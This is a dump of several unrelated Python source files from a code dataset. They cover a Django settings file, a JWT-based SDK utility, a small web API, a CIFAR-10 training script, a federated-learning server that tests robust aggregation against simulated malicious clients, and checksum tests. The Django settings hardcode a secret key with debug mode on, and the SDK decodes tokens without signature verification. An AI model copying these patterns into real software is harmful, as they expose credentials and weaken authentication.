Previous SSFs --\")\n\n\n print(\"Starting Filtering...\")\n np_cross = filterModule(dict_ranked_features, controller)\n print(\"-- Filtering Finished --\")\n print(\"\")\n\n print(\"Starting Cross Process...\")\n dict_significant_results = crossProcessModule(df_dataset, np_cross, curr_depth, controller)\n print(\"-- Cross Process Finished --\")\n\n return dict_significant_results\n\n\n\n\n","sub_path":"AutomatedMining_RUN.py","file_name":"AutomatedMining_RUN.py","file_ext":"py","file_size_in_byte":11252,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"191080265","text":"\"\"\"\nutils\n~~~~~~~~~~\nVarious utilities for nextcode-sdk functionality.\n\"\"\"\n\nimport jwt\nimport logging\nfrom urllib.parse import urlsplit\nimport requests\nfrom requests import codes\n\nfrom .exceptions import ServerError, InvalidToken\n\nlog = logging.getLogger(__name__)\n\n\ndef decode_token(token):\n try:\n decoded_token = jwt.decode(token, algorithms=[\"RS256\"], verify=False)\n return decoded_token\n except (KeyError, jwt.InvalidTokenError):\n raise InvalidToken(\"Token could not be decoded\")\n\n\ndef check_resp_error(resp):\n response_json = None\n try:\n resp.raise_for_status()\n except Exception:\n desc = resp.text\n try:\n response_json = resp.json()\n desc = response_json[\"error\"][\"description\"]\n log.info(response_json)\n if \"errors\" in response_json[\"error\"]:\n desc += \" (%s)\" % (response_json[\"error\"][\"errors\"])\n except Exception:\n pass\n if not desc:\n desc = \"Status code %s received (%s)\" % (resp.status_code, resp.text)\n else:\n desc += \" (code %s)\" % resp.status_code\n if resp.status_code >= 500:\n desc = \"Server error in call to %s\" % resp.url\n desc += \" - Response headers: %s\" % resp.headers\n desc += \" - Response body: %s\" % resp.text\n log.error(desc)\n else:\n log.info(\"Server error in call to %s\", resp.url)\n\n error = ServerError(desc, url=resp.url, response=response_json)\n raise error from None\n\n\ndef root_url_from_api_key(api_key):\n payload = decode_token(api_key)\n parts = urlsplit(payload[\"iss\"])\n root_url = \"{scheme}://{netloc}\".format(scheme=parts.scheme, netloc=parts.netloc)\n return root_url\n\n\ndef get_access_token(api_key):\n \"\"\"\n \"\"\"\n payload = decode_token(api_key)\n client_id = payload[\"azp\"]\n body = {\n \"grant_type\": \"refresh_token\",\n \"client_id\": client_id,\n \"refresh_token\": api_key,\n \"username\": \"dummy_user\",\n }\n headers = {\"Content-Type\": \"application/x-www-form-urlencoded\"}\n token_endpoint = \"{}/protocol/openid-connect/token\".format(payload[\"iss\"])\n\n # Call the auth server\n log.info(\"Authenticating with %s\", token_endpoint)\n response = requests.post(token_endpoint, data=body, headers=headers)\n if (\n response.status_code == codes.bad_request\n and \"Refresh token expired\" in response.text\n ):\n raise InvalidToken(\"Refresh token has expired\")\n elif response.status_code >= codes.bad_request:\n try:\n if response.json():\n raise InvalidToken(response.json().get(\"error_description\"))\n except Exception:\n pass\n\n try:\n response.raise_for_status()\n except Exception:\n log.error(\"Body: %s\" % body)\n raise InvalidToken(\n \"Error authenticating with %s: %s\" % (token_endpoint, response.text)\n )\n\n return response.json()[\"access_token\"]\n","sub_path":"nextcode/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":3003,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"540703469","text":"# Copyright (c) 2011, Scott Ferguson\n# All rights reserved.\n# \n# Redistribution and use in source and binary forms, with or without\n# modification, are permitted provided that the following conditions are met:\n# * Redistributions of source code must retain the above copyright\n# notice, this list of conditions and the following disclaimer.\n# * Redistributions in binary form must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer in the\n# documentation and/or other materials provided with the distribution.\n# * Neither the name of the software nor the\n# names of its contributors may be used to endorse or promote products\n# derived from this software without specific prior written permission.\n# \n# THIS SOFTWARE IS PROVIDED BY SCOTT FERGUSON ''AS IS'' AND ANY\n# EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED\n# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE\n# DISCLAIMED. IN NO EVENT SHALL SCOTT FERGUSON BE LIABLE FOR ANY\n# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES\n# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;\n# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND\n# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT\n# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS\n# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n\nfrom djangoappengine.settings_base import *\n\nimport os\n\nSECRET_KEY = '=r-$b*8hgw3sc58&9t0twan5ch1k-3d3vfc4(wk0rn3wa1dhvi'\n\nDEBUG = True\n\nINSTALLED_APPS = (\n 'djangoappengine',\n 'djangotoolbox',\n 'django.contrib.admin',\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'console',\n)\n\nMIDDLEWARE_CLASSES = (\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n)\n\nTEMPLATE_CONTEXT_PROCESSORS = (\n 'django.contrib.auth.context_processors.auth',\n 'django.core.context_processors.request',\n)\n\nLOGIN_REDIRECT_URL = '/'\n\nADMIN_MEDIA_PREFIX = '/media/admin/'\nMEDIA_ROOT = os.path.join(os.path.dirname(__file__), 'media')\nTEMPLATE_DIRS = (os.path.join(os.path.dirname(__file__), 'templates'),)\n\nROOT_URLCONF = 'urls'\n","sub_path":"settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":2358,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"373973064","text":"import datetime\n\nfrom ntv.shortcuts import search as search_channels\n\nfrom .webapi import api\n\n\nroot = api.resource('/')\nchannel_collection = api.resource('channels')\nchannel = api.resource('channels/:id')\n\n\n@root.get()\ndef view_root(ctx):\n return ctx.Response({\n '@context': {\n 'schema': 'http://schema.org/',\n 'Collection': 'schema:Collection'\n },\n 'collections': [\n {\n '@id': ctx.url_for(channel_collection),\n '@type': 'Collection',\n 'description': ''\n }\n ]\n })\n\n\n@channel_collection.get()\ndef view_channels(ctx):\n \"\"\"\n Channels query logic\n \"\"\"\n\n date = datetime.date.today()\n query = {}\n if 'name' in ctx.parameters:\n query['channel_name'] = ctx.parameters['name'].strip()\n return ctx.Response(search_channels(date, **query).values())\n\n\n@channel.get()\ndef view_channel_details(ctx, id):\n date = datetime.date.today()\n id = int(id)\n try:\n obj = search_channels(date, channel_id=id)[id]\n except IndexError:\n return ctx.NotFound()\n else:\n return ctx.Response(obj)\n\n\n@channel_collection.representation()\ndef dump_channel_collection(channels, ctx):\n \"\"\"\n Channels collection representation\n \"\"\"\n\n return {\n '@context': {\n 'schema': 'http://schema.org/',\n 'Collection': 'schema:Collection'\n },\n '@id': ctx.url_for(channel_collection),\n '@type': 'Collection',\n 'potentialAction': [\n {\n '@type': 'SearchAction',\n 'target': '{}/?name={name}',\n 'query-input': 'required name=name',\n },\n ],\n 'channels': [{\n '@id': ctx.url_for(channel, id=x['id']),\n '@type': 'Channel',\n 'name': x['name'],\n } for x in channels\n ],\n }\n\n\n@channel.representation()\ndef dump_channel_detail(obj, ctx):\n return {\n '@context': {\n 'schema': 'http://schema.org/',\n 'Channel': 'schema:TelevisionChannel'\n },\n '@type': 'Channel',\n '@id': ctx.url_for(channel, id=obj['id']),\n 'potentialAction': [\n {\n '@type': 'SearchAction',\n 'target': '{}/?date={date}',\n 'query-input': 'required name=date',\n },\n {\n '@type': 'SearchAction',\n 'target': '{}/?movie={title}',\n 'query-input': 'required name=title',\n },\n ],\n 'name': obj['name'],\n 'movies': [{\n 'title': m.get('title'),\n 'start_time': str(m.get('start_time')),\n 'end_time': str(m.get('end_time')),\n } for m in obj['movies']],\n }\n","sub_path":"ntv/api/services.py","file_name":"services.py","file_ext":"py","file_size_in_byte":2804,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"328010310","text":"import numpy as np\nimport pickle\nimport torch\nimport torch.nn as nn\nimport torchvision.transforms as transforms\nfrom torch.utils.data import DataLoader, Dataset\n\n\ndef unpickle(file):\n with open(file, 'rb') as fo:\n data_dict = pickle.load(fo, encoding='bytes')\n return data_dict\n\n\ndef eval_acc(pred, true_label):\n pred_label = torch.argmax(pred, dim=1)\n return torch.sum(pred_label == true_label)\n\n\nclass ImgDataset(Dataset):\n\n def __init__(self, x, y, transform, device='cpu'):\n self.x = x\n self.y = torch.LongTensor(y)\n self.transform = transform\n self.device = device\n\n def __len__(self):\n return len(self.x)\n\n def __getitem__(self, index):\n return self.transform(self.x[index]).to(self.device), self.y[index].to(self.device)\n\n\nclass MY_MODULE(nn.Module):\n\n def __init__(self):\n super(MY_MODULE, self).__init__()\n # input [32, 32]\n self.layers = nn.Sequential(\n nn.Conv2d(3, 64, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1), bias=False), # [32, 32]\n nn.BatchNorm2d(64, eps=1e-05, momentum=0.1), # [32, 32]\n nn.ReLU(),\n nn.MaxPool2d(kernel_size=2, stride=2, padding=0, dilation=1), # [16, 16]\n\n nn.Conv2d(64, 128, kernel_size=(1, 1), stride=(1, 1), bias=False),\n nn.BatchNorm2d(128, eps=1e-05, momentum=0.1),\n nn.ReLU(),\n nn.MaxPool2d(kernel_size=2, stride=2, padding=0, dilation=1), # [8, 8]\n\n nn.Conv2d(128, 256, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1), bias=False), # [8, 8]\n nn.BatchNorm2d(256, eps=1e-05, momentum=0.1), # [8, 8]\n nn.ReLU(),\n nn.MaxPool2d(kernel_size=2, stride=2, padding=0, dilation=1), # [4, 4]\n\n nn.Conv2d(256, 256, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1), bias=False),\n nn.BatchNorm2d(256, eps=1e-05, momentum=0.1),\n nn.ReLU(),\n nn.MaxPool2d(kernel_size=2, stride=2, padding=0, dilation=1),\n )\n self.fc = nn.Sequential(\n nn.Linear(1024, 256, bias=True),\n nn.ReLU(),\n nn.Linear(256, 10, bias=True),\n )\n\n def forward(self, img):\n tmp_data = self.layers(img)\n output = self.fc(tmp_data.reshape(tmp_data.size(0), -1))\n return output\n\n\ntrain_transform = transforms.Compose([\n transforms.ToPILImage(),\n transforms.Scale(40),\n transforms.RandomHorizontalFlip(),\n transforms.RandomCrop(32),\n transforms.ToTensor(),\n transforms.Normalize([0.5, 0.5, 0.5], [0.5, 0.5, 0.5])\n])\ntest_transform = transforms.Compose([\n transforms.ToPILImage(),\n transforms.ToTensor(),\n transforms.Normalize(mean=(0.5, 0.5, 0.5), std=(0.5, 0.5, 0.5))\n])\n\nBATCH_SIZE = 64\nLR = 0.005\nWEIGHT_DECAY = 0.05\nMOMENTUM = 0.9\nNUM_EPOCH = 30\n\ntrain_data = []\ntrain_label = []\ndata_dir = 'data/cifar_10'\nfor i in range(5):\n batch_data = unpickle(data_dir + '/data_batch_' + str(i + 1))\n train_data.append(batch_data[b'data'].reshape(-1, 32, 32, 3))\n train_label.append(np.array(batch_data[b'labels']))\ntrain_data = np.concatenate(train_data, axis=0)\ntrain_label = np.concatenate(train_label, axis=0)\n\nbatch_data = unpickle('data/cifar_10/test_batch')\ntest_data = batch_data[b'data'].reshape(-1, 32, 32, 3)\ntest_label = np.array(batch_data[b'labels'])\n\ntrain_set = ImgDataset(train_data, train_label, train_transform, 'cuda')\ntrain_loader = DataLoader(train_set, batch_size=BATCH_SIZE, shuffle=True)\ntest_set = ImgDataset(test_data, test_label, test_transform, 'cuda')\ntest_loader = DataLoader(test_set, batch_size=BATCH_SIZE, shuffle=False)\n\nmodel = MY_MODULE().cuda()\nloss_fn = nn.CrossEntropyLoss().cuda()\noptimizer = torch.optim.SGD(model.parameters(), lr=LR, momentum=MOMENTUM, weight_decay=WEIGHT_DECAY)\n\nfor epoch in range(NUM_EPOCH):\n model.train()\n train_cor = 0\n train_tot = 0\n for i, data in enumerate(train_loader):\n optimizer.zero_grad()\n output = model(data[0])\n loss = loss_fn(output, data[1])\n loss.backward()\n optimizer.step()\n train_cor += eval_acc(output, data[1])\n train_tot += len(data[0])\n if i % 50 == 49:\n print('epoch:{:d}, step:{:d}, loss={:.4f}'.format(epoch, i + 1, loss), end='\\r')\n\n model.eval()\n test_cor = 0\n test_tot = 0\n with torch.no_grad():\n for i, data in enumerate(test_loader):\n output = model(data[0])\n test_cor += eval_acc(output, data[1])\n test_tot += len(data[0])\n print('epoch {:d}/{:d}, loss={:.4f}, train_acc={:.2f}, test_acc={:.2f}'.format(epoch, NUM_EPOCH, loss,\n train_cor / train_tot * 100,\n test_cor / test_tot * 100))","sub_path":"homework_01/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":4865,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"526075166","text":"import pickle\nimport uuid\nimport torch\nimport random\nimport codecs\nimport numpy as np\nimport datetime\nimport argparse\nimport gc\nimport tensorflow as tf\nfrom attention import Attention\nimport datasource\nfrom models import GlobalModel, GlobalModel_MNIST_CNN, RESNET18_MODEL, LENET5_MODEL, LENET5_MODEL_FEMNIST\nfrom fl_client import FederatedClient\nfrom datasource import Mnist\nclass FLServer(object):\n\n MIN_NUM_WORKERS = 4\n # MIN_NUM_WORKERS = 10\n\n # MAX_NUM_ROUNDS = 100\n MAX_NUM_ROUNDS = 36\n NUM_CLIENTS_CONTACTED_PER_ROUND = 4\n # NUM_CLIENTS_CONTACTED_PER_ROUND = 10\n\n ROUNDS_BETWEEN_VALIDATIONS = 1\n # LENET5_MODEL_FEMNIST, \"127.0.0.1\", 5000, gpu, output=args.output, aggregation=args.aggregation\n def __init__(self, global_model,aggregation=\"normal_atten\"):\n # FLServer(GlobalModel_MNIST_CNN, \"127.0.0.1\", 5000, gpu)\n\n # os.environ['CUDA_VISIBLE_DEVICES'] = '%d'%gpu\n self.global_model = global_model()\n self.ready_client_sids = set()\n\n # self.host = host\n # self.port = port\n self.client_resource = {}\n\n self.wait_time = 0\n\n self.model_id = str(uuid.uuid4())\n\n self.aggregation = aggregation\n self.attention_mechanism = Attention()\n #####\n # training states\n self.current_round = -1 # -1 for not yet started\n self.current_round_client_updates = []\n self.eval_client_updates = []\n #####\n\n self.invalid_tolerate = 0\n\n\n def handle_client_update(self, data):\n\n self.current_round_client_updates = data\n uploaded_weights = [ x['weights'] for x in self.current_round_client_updates ]\n\n if self.aggregation in [\"normal_atten\", \"atten\", \"rule_out\"]:\n\n if self.aggregation == \"normal_atten\":\n # Same atttention\n print(\"### Update with normal attention mechanism! ###\")\n attention = np.tile( np.array([1.0]), len(uploaded_weights) )\n else:\n print(\"### Update with calculated attention mechanism! ###\")\n # attention = self.attention_mechanism.cal_weights(np.array( uploaded_weights ))\n attention = self.attention_mechanism.cal_weights(np.array( uploaded_weights ))\n print(\"old attention\", attention)\n # type(attention): shape (10, )\n\n if self.aggregation == \"rule_out\":\n # Rule out\n new_attention = np.zeros(attention.shape)\n for idx in range(len(attention)):\n if attention[idx] > np.mean(attention):\n new_attention[idx] = 1.0\n attention = new_attention\n print(\"new attention\", attention)\n\n\n attack_label = [ \"{}_{}\".format(x['attack_mode'], x['assigned_label'])\n for x in self.current_round_client_updates ]\n self.global_model.update_weights_with_attention(\n uploaded_weights,\n [x['train_size'] for x in self.current_round_client_updates],\n attention,\n attack_label\n )\n \n else:\n print(\"### Update with baseline methods! ###\")\n self.global_model.update_weights_baseline(\n uploaded_weights,\n [x['train_size'] for x in self.current_round_client_updates],\n self.aggregation\n )\n\n aggr_train_loss, aggr_train_accuracy = self.global_model.aggregate_train_loss_accuracy(\n [x['train_loss'] for x in self.current_round_client_updates],\n [x['train_accuracy'] for x in self.current_round_client_updates],\n [x['train_size'] for x in self.current_round_client_updates],\n self.current_round\n )\n if self.global_model.prev_train_loss is not None and self.global_model.prev_train_loss < aggr_train_loss:\n self.invalid_tolerate = self.invalid_tolerate + 1\n else:\n self.invalid_tolerate = 0\n self.global_model.prev_train_loss = aggr_train_loss\n\n def handle_client_eval(self, data):\n if self.eval_client_updates is None:\n return\n\n self.eval_client_updates = data\n\n # tolerate 30% unresponsive clients\n\n aggr_test_loss, aggr_test_accuracy = self.global_model.aggregate_loss_accuracy(\n [x['test_loss'] for x in self.eval_client_updates],\n [x['test_accuracy'] for x in self.eval_client_updates],\n [x['test_size'] for x in self.eval_client_updates],\n )\n print(\"\\n--------Aggregating test loss---------\\n\")\n print(\"aggr_test_loss\", aggr_test_loss)\n print(\"aggr_test_accuracy\", aggr_test_accuracy)\n print(\"best model at round \", self.global_model.best_round, \", get the best loss \", self.global_model.best_loss)\n print(\"== done ==\")\n self.eval_client_updates = None # special value, forbid evaling again\n\n\n # Note: we assume that during training the #workers will be >= MIN_NUM_WORKERS\n def train_next_round(self, clients):\n\n self.current_round += 1\n # buffers all client updates\n self.current_round_client_updates = []\n\n print(\"\\n ### Round \", self.current_round, \"### \\n\")\n\n # print(\"request updates from\", client_sids_selected)\n # by default each client cnn is in its own \"room\"\n\n # path = os.path.join(\"../\",'saved_weights', 'iteration_' + str(self.current_round))\n # if not os.path.exists(path):\n # os.makedirs(path)\n # np.save( os.path.join(path, \"server_weights\"), self.global_model.current_weights)\n\n train_next_round_info = {\n 'model_id': self.model_id,\n 'round_number': self.current_round,\n # 'current_weights': obj_to_pickle_string(self.global_model.current_weights),\n 'current_weights': self.global_model.current_weights,\n 'weights_format': 'not pickle',\n 'run_validation': self.current_round % FLServer.ROUNDS_BETWEEN_VALIDATIONS == 0,\n }\n return train_next_round_info\n\n def stop_and_eval(self):\n self.eval_client_updates = []\n for rid in self.ready_client_sids:\n #emit('stop_and_eval', {\n #\t\t'model_id': self.model_id,\n #\t\t'current_weights': obj_to_pickle_string(self.global_model.current_weights),\n #\t\t'weights_format': 'pickle'\n #\t}, room=rid)\n self.emit('stop_and_eval', {\n 'model_id': self.model_id,\n # 'current_weights': obj_to_pickle_string(self.global_model.best_weight),\n 'current_weights': self.global_model.best_weight,\n 'weights_format': 'not pickle'\n }, room=rid)\n\n # def start(self):\n # \tself.socketio.run(self.app, host=self.host, port=self.port, log_output=False)\n\ndef obj_to_pickle_string(x):\n return codecs.encode(pickle.dumps(x), \"base64\").decode()\n # return msgpack.packb(x, default=msgpack_numpy.encode)\n # TODO: compare pickle vs msgpack vs json for serialization; tradeoff: computation vs network IO\n\ndef pickle_string_to_obj(s):\n return pickle.loads(codecs.decode(s.encode(), \"base64\"))\n\ndef str2bool(v):\n if v.lower() in ('yes', 'true', 't', 'y', '1'):\n return True\n elif v.lower() in ('no', 'false', 'f', 'n', '0'):\n return False\n else:\n raise argparse.ArgumentTypeError('Unsupported value encountered!')\ndef test(info,x_test, y_test,aggregation,train=True,iid=True):\n\n # device = torch.device(\"cpu\")\n model_ = GlobalModel_MNIST_CNN()\n model = model_.build_model()\n model.set_weights(info['current_weights'])\n score = model.evaluate(x_test, y_test, verbose=1)\n if train:\n if iid:\n with open(aggregation + '_minist_iid_train_acc_结果存放.txt', 'a') as file_handle:\n file_handle.write(str(score[1]))\n file_handle.write('\\n')\n else:\n with open(aggregation + '_minist_noniid_train_acc_结果存放.txt', 'a') as file_handle:\n file_handle.write(str(score[1]))\n file_handle.write('\\n')\n else:\n if iid:\n with open(aggregation + '_minist_iid_test_acc_结果存放.txt', 'a') as file_handle:\n file_handle.write(str(score[1]))\n file_handle.write('\\n')\n else:\n with open(aggregation + '_minist_noniid_test_acc_结果存放.txt', 'a') as file_handle:\n file_handle.write(str(score[1]))\n file_handle.write('\\n')\n return score\n\ndef make_print_to_file(path='./'):\n '''\n path, it is a path for save your log about fuction print\n example:\n use make_print_to_file() and the all the information of funtion print , will be write in to a log file\n :return:\n '''\n import sys\n import os\n # import config_file as cfg_file\n import sys\n import datetime\n\n class Logger(object):\n def __init__(self, filename=\"Default.log\", path=\"./\"):\n self.terminal = sys.stdout\n self.log = open(os.path.join(path, filename), \"a\", encoding='utf8', )\n\n def write(self, message):\n self.terminal.write(message)\n self.log.write(message)\n\n def flush(self):\n pass\n\n fileName = datetime.datetime.now().strftime('day' + '%Y_%m_%d')\n sys.stdout = Logger(fileName + '.log', path=path)\n\n #############################################################\n # 这里输出之后的所有的输出的print 内容即将写入日志\n #############################################################\n print(fileName.center(60, '*'))\n\n\nif __name__ == '__main__':\n random.seed(1)\n np.random.seed(1)\n make_print_to_file(path='./')\n Minst_1 = Mnist(20,10)\n writers_all = Minst_1.partitioned_by_rows(num_workers=10)\n # writers = writers_all[\"train\"]#iid数据\n writers = Minst_1.client()#noniid数据\n # data = datasource.MINSIT_NONIID()\n train_x,train_y = Minst_1.global_train()[0],Minst_1.global_train()[1]\n data_test = Minst_1.test_data()\n x_test, y_test = data_test[0],data_test[1]\n # writers = data.client()\n # print(len(writers))\n parser = argparse.ArgumentParser()\n parser.add_argument('--gpu', \t\t type=int, default = 0)\n parser.add_argument('--aggregation', \ttype=str, \n choices = [\"normal_atten\", \"atten\", \"rule_out\", \"TrimmedMean\", \"Krum\", \"GeoMed\"],\n default = \"Krum\")\n parser.add_argument('--output', \t type=str, default = \"stats.txt\")\n parser.add_argument(\"--batch_size\", type=int, default = 100)\n parser.add_argument(\"--local_epoch\", type=int, default = 1)\n parser.add_argument(\"--select_ratio\", type=float, default = 1)\n parser.add_argument(\"--attack_mode\", type=int, default = 3)\n parser.add_argument(\"--attack_ratio\", type=float, default = 0.2)\n args = parser.parse_args()\n gpu = args.gpu\n\n # if gpu != -1:\n # os.environ['CUDA_VISIBLE_DEVICES'] = '%d'%gpu\n # K.tensorflow_backend._get_available_gpus()\n #\n # config = tf.ConfigProto( device_count = {'GPU': 1, 'CPU':10} )\n # sess = tf.Session(config=config)\n # keras.backend.set_session(sess)\n\n print(\"##### Arguements #####\")\n print(args)\n print(\"##########\")\n NUM_CLIENT = int( len(writers) * args.select_ratio )\n MAX_NUM_ROUNDS = 50\n server = FLServer(GlobalModel_MNIST_CNN, aggregation=args.aggregation)\n acc_avg = 0\n train_acc = {}\n test_loss = {}\n test_acc = {}\n for cur_round in range(MAX_NUM_ROUNDS):\n\n temp_session = tf.Session()\n # tf.compat.v1.disable_v2_behavior()\n # tf.compat.v1.disable_eager_execution()\n with temp_session.as_default():\n with temp_session.graph.as_default():\n\n ##### Prepare and Select Clients #####\n clients = []\n selected_writers = np.random.choice( len(writers), size=NUM_CLIENT, replace=False )\n \n attack_mode = [0] * len(selected_writers)\n attack_number = int( args.attack_ratio * len(selected_writers) ) \n for attack_idx in range(attack_number):\n attack_mode[attack_idx] = args.attack_mode\n print(\"Selected Writers\", selected_writers, len(selected_writers))\n print(\"Attack Modes\", attack_mode)\n\n# feiminst数据集使用\n# for selected_idx in range(len(selected_writers)):\n# clients.append( FederatedClient(\"127.0.0.1\", 5000, datasource.Mnist, gpu,\n# attack_mode[selected_idx], writer=writers[ selected_writers[selected_idx] ]) )\n for selected_idx in range(len(selected_writers)):\n clients.append(FederatedClient(gpu,\\\n attack_mode[selected_idx], writer=writers[ selected_writers[selected_idx] ], number=selected_writers[selected_idx]) )\n init_info = {\n # 'model_json': server.global_model.model.to_json(),\n 'model_json': server.global_model.model,\n 'model_id': server.model_id,\n 'min_train_size': 500,\n 'data_split': (0.6, 0.3, 0.1), # train, test, valid\n 'epoch_per_round': args.local_epoch,\n 'batch_size': args.batch_size,\n 'request_sid': \"rid\", #request.sid,\n }\n\n for client in clients:\n client.on_init( init_info )\n ########\n\n train_next_round_info = server.train_next_round( clients )\n\n clients_resp = []\n for client_idx in range(len(clients)):\n print( \"Round {}/{} Client {}/{} is training TIME: {}\".format(cur_round, MAX_NUM_ROUNDS, client_idx, NUM_CLIENT, datetime.datetime.now().strftime('%m-%d %H:%M:%S')) )\n clients_resp.append( clients[client_idx].on_request_update(train_next_round_info) )\n print( \"-------------------------------------------\" )\n temp_session.close()\n # for i in clients_resp:\n # acc_avg =\n # acc_avg = sum(d['train_accuracy'] for d in clients_resp)/len(clients_resp)\n # if cur_round not in\n # train_acc[cur_round] = acc_avg\n # acc_avg = sum(clients_resp[i]['train_accuracy'])/len(clients_resp) for i in range(len(clients_resp))\n score_test = test(train_next_round_info, x_test, y_test,args.aggregation,train=False,iid=False)\n score_train = test(train_next_round_info, train_x,train_y, args.aggregation,train=True,iid=False)\n # test_loss[cur_round] = score[0]\n test_acc[cur_round] = score_test[1]\n train_acc[cur_round] = score_train[1]\n print('test_acc:',score_test[1])\n print('train_acc:',score_test[1])\n server.handle_client_update(clients_resp)\n while len(clients) != 0:\n del clients[0]\n del clients\n del clients_resp\n for _ in range(20):\n gc.collect()\n print('train_acc:',train_acc)\n print('test_loss:',test_loss)\n print('test_acc:',test_acc)\n\n\n # print(train_acc)\n\n\n # stop_and_eval_info = {\n # 'model_id': server.model_id,\n # # 'current_weights': obj_to_pickle_string(server.global_model.best_weight),\n # 'current_weights': server.global_model.best_weight,\n # 'weights_format': 'not_pickle'\n # }\n # clients_stop_and_eval_resp = []\n # print( \"\\n-------------------Run Testing-------------------\" )\n # ##### Prepare and Select Clients #####\n # clients = []\n # selected_writers = np.random.choice( len(writers), size=NUM_CLIENT, replace=False )\n #\n # attack_mode = [0] * len(selected_writers)\n # attack_number = int( args.attack_ratio * len(selected_writers) )\n # for attack_idx in range(attack_number):\n # attack_mode[attack_idx] = args.attack_mode\n # print(\"Selected Writers\", selected_writers, len(selected_writers))\n # print(\"Attack Modes\", attack_mode)\n #\n # for selected_idx in range(len(selected_writers)):\n # clients.append( FederatedClient(\"127.0.0.1\", 5000, datasource.FEMNIST, gpu,\n # attack_mode[selected_idx], writer=writers[ selected_writers[selected_idx] ]) )\n #\n # init_info = {\n # 'model_json': server.global_model.model.to_json(),\n # 'model_id': server.model_id,\n # 'min_train_size': 500,\n # 'data_split': (0.6, 0.3, 0.1), # train, test, valid\n # 'epoch_per_round': args.local_epoch,\n # 'batch_size': args.batch_size,\n # 'request_sid': str(12313), #request.sid,\n # }\n #\n # for client in clients:\n # client.on_init( init_info )\n # ########\n # for client_idx in range(len(clients)):\n # print( \"Client {} is runnng testing\".format(client_idx) )\n # clients_stop_and_eval_resp.append( client.on_stop_and_eval(stop_and_eval_info) )\n # print( \"-------------------------------------------\" )\n #\n #server.handle_client_eval(clients_stop_and_eval_resp)\n\n\n\n\n \n\n","sub_path":"Theroy/Krum_minist_noiid/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":17616,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"551768546","text":"import uuid\n\nimport boto3\n\nfrom .. import UploadTestCaseUsingMockAWS\nfrom ... import FixtureFile\n\nfrom upload.common.upload_area import UploadArea\nfrom upload.common.dss_checksums import DssChecksums\n\n\nclass TestDssChecksums(UploadTestCaseUsingMockAWS):\n\n def setUp(self):\n super().setUp()\n\n self.upload_area_id = str(uuid.uuid4())\n self.upload_area = UploadArea(self.upload_area_id)\n self.upload_area.update_or_create()\n\n self.checksum_id = str(uuid.uuid4())\n self.job_id = str(uuid.uuid4())\n\n self.s3client = boto3.client('s3')\n\n def tearDown(self):\n super().tearDown()\n\n def test_it_acts_like_a_dict(self):\n checksums = DssChecksums(s3_object=None, checksums={'crc32c': 'a', 'sha1': 'b', 'sha256': 'c', 's3_etag': 'd'})\n self.assertEqual(4, len(checksums))\n self.assertEqual('b', checksums['sha1'])\n self.assertIn('sha256', checksums)\n self.assertEqual(['crc32c', 's3_etag', 'sha1', 'sha256'], sorted(checksums.keys()))\n\n def test_are_present__for_an_object_with_no_checksums__returns_false(self):\n filename = 'file1'\n s3obj = self.mock_upload_file_to_s3(self.upload_area_id, filename, checksums={})\n\n self.assertFalse(DssChecksums(s3_object=s3obj).are_present())\n\n def test_are_present__for_an_object_with_partial_checksums__returns_false(self):\n filename = 'file2'\n s3obj = self.mock_upload_file_to_s3(self.upload_area_id, filename, checksums={\n 'sha1': '1',\n 'sha256': '2'\n })\n\n self.assertFalse(DssChecksums(s3_object=s3obj).are_present())\n\n def test_are_present__for_an_object_with_all_checksums__returns_true(self):\n filename = 'file3'\n s3obj = self.mock_upload_file_to_s3(self.upload_area_id, filename, checksums={\n 'sha1': '1',\n 'sha256': '2',\n 's3_etag': '3',\n 'crc32c': '4'\n })\n\n self.assertTrue(DssChecksums(s3_object=s3obj).are_present())\n\n def test_init_reads_checksums_from_s3_object(self):\n s3obj = self.create_s3_object(object_key=\"file4\")\n tagging = [\n {'Key': 'hca-dss-sha1', 'Value': '1'},\n {'Key': 'hca-dss-sha256', 'Value': '2'},\n {'Key': 'hca-dss-crc32c', 'Value': '3'},\n {'Key': 'hca-dss-s3_etag', 'Value': '4'}\n ]\n self.s3client.put_object_tagging(Bucket=s3obj.bucket_name,\n Key=s3obj.key,\n Tagging={'TagSet': tagging})\n\n checksums = DssChecksums(s3_object=s3obj)\n\n self.assertEqual({'crc32c': '3', 'sha1': '1', 'sha256': '2', 's3_etag': '4'}, checksums)\n\n def test_compute(self):\n test_file = FixtureFile.factory(\"foo\")\n s3obj = self.mock_upload_file_to_s3(self.upload_area_id, test_file.name, contents=test_file.contents)\n\n self.assertEqual(DssChecksums(s3_object=s3obj).compute(), test_file.checksums)\n\n def test_save_as_tags_on_s3_object(self):\n s3obj = self.create_s3_object(object_key=\"foo\")\n\n checksums = DssChecksums(s3obj, checksums={'sha1': 